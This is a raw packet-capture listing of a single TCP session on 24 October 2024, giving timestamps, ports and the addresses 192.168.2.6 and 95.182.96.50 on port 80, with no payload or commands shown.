Oct 24, 2024 13:54:22.338702917 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.338706017 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.338743925 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.338778019 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.338788986 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.338814020 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.338846922 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.338860035 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.338886023 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.338913918 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.338929892 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.338947058 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.338980913 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.338988066 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.339015007 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.339049101 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.339075089 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.339088917 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.339135885 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.339170933 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.339200020 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.339216948 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.339231968 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.339266062 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.339279890 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.339299917 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.339306116 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.339340925 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.339351892 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.339385033 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.339416027 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.339420080 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.339432955 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.339453936 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.339487076 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.339499950 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.339517117 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.339533091 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.339551926 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.339561939 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.339586973 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.339622021 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.339634895 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.339656115 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.339663982 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.339690924 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.339725018 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.339756012 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.339761972 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.339773893 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.339790106 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.339819908 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.339854002 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.339867115 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.339889050 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.339919090 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.339940071 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.339952946 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.339961052 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.339987993 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.340003967 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.340020895 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.340025902 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.340054989 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.340089083 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.340122938 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.340133905 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.340157986 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.340189934 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.340200901 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.340224028 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.340230942 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.340259075 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.340264082 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.340295076 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.340342999 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.380604982 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.380656958 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.380697966 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.380772114 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.449517965 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.449583054 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.449594975 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.449632883 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.449656010 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.449668884 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.449704885 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.449717045 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.449740887 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.449747086 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.449779034 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.449822903 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.449836969 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.449892044 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.449893951 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.449927092 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.449963093 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.449991941 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.450014114 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.450040102 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.450042963 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.450098991 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.450129032 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.450144053 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.450181007 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.450223923 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.450233936 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.450269938 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.450309038 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.450314045 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.450339079 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.450361967 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.450373888 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.450385094 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.450408936 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.450442076 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.450445890 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.450476885 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.450510979 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.450545073 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.450552940 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.450578928 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.450613022 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.450639009 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.450645924 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.450680971 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.450685024 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.450714111 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.450721025 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.450732946 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.450757980 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.450767040 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.450793982 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.450814009 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.450835943 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.450850010 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.450885057 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.450894117 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.450918913 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.450953960 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.450987101 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.451000929 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.451016903 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.451026917 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.451050043 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.451057911 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.451086044 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.451133013 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.451138973 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.451174974 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.451208115 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.451220036 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.451252937 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.451265097 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.451294899 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.451327085 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.451354980 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.451375961 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.451410055 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.451417923 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.451443911 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.451483965 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.451488972 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.451517105 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.451528072 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.451553106 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.451566935 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.451587915 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.451596975 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.451623917 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.451628923 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.451658964 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.451694012 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.451704025 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.451729059 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.451772928 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.451817989 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.451824903 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.451860905 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.451875925 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.451900005 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.451914072 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.451965094 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.452018976 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.452052116 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.452052116 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.452055931 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.452079058 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.452102900 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.452109098 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.452143908 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.452164888 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.452198982 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.452223063 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.452258110 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.452292919 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.452308893 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.452327967 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.452334881 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.452379942 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.452379942 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.452414989 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.452461958 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.452467918 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.452502966 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.452533007 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.452548981 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.452574015 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.452586889 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.452630043 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.452640057 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.452677011 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.452709913 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.452739954 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.452754021 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.452771902 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.452774048 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.452806950 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.452821016 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.452847004 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.452881098 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.452913046 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.452924013 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.452948093 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.452981949 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.452991962 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.453016996 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.453052998 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.453085899 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.453095913 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.453147888 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.453193903 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.453202009 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.453237057 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.453270912 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.453279018 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.453314066 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.453326941 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.453363895 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.453403950 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.453417063 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.453470945 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.453497887 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.453506947 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.453516006 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.453525066 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.453547001 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.453552008 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.453568935 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.453572989 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.453586102 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.453588009 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.453608036 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.453615904 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.453624010 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.453629971 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.453663111 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.453665972 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.453682899 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.453691006 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.453696012 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.453721046 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.453722954 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.453739882 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.453742027 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.453758955 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.453763962 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.453778028 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.453778028 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.453797102 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.453804970 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.453809977 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.453820944 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.453835011 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.453847885 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.453851938 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.453867912 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.453867912 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.453876019 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.453886032 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.453896046 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.453906059 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.453912973 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.453919888 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.453927994 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.453943014 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.453948975 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.453963041 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.453969955 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.453979969 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.453989983 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.453999043 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.454020977 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.454025030 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.454036951 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.454056025 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.454070091 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.454077959 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.454086065 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.454094887 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.454103947 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.454112053 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.454137087 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.454149961 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.454153061 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.454169989 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.454173088 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.454186916 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.454193115 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.454206944 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.454219103 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.454226017 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.454236984 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.454252958 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.454271078 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.454278946 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.454288006 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.454296112 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.454307079 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.454322100 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.454329967 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.454339027 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.454349995 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.454354048 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.454375029 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.454375029 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.454391003 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.454399109 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.454406977 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.454417944 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.454421997 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:22.454428911 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:22.454436064 CEST	80	49714	95.182.96.50	192.168.2.6
